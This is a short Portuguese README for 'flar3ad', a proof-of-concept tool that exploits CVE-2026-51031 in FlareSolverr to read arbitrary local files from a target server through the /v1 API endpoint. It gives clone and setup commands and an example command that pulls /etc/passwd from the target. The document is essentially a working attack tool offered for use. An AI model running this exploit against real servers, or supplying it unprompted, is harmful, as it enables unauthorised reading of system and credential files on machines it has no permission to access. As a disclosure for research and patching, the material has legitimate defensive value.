
PoC do CVE-2026-51031 para leitura arbitrária de arquivos locais
flar3ad é uma ferramenta que aproveita a CVE-2026-51031 para ler arquivos de um servidor alvo, utilizando o endpoint /v1 da API do FlareSolverr e a função driver.get() para explorar a vulnerabilidade. Explicado em detalhes no blog do xinyi.
git clone https://github.com/daemoncibsec/flar3ad.git
cd flar3ad
python3 -m venv venv
source venv/bin/activate
pip install rich
pip install argparse
pip install requests
chmod +x flar3ad
Para sair do venv:
deactivate
Leia o arquivo /etc/passwd do servidor alvo.
./flar3ad http://localhost:8191/ /etc/passwd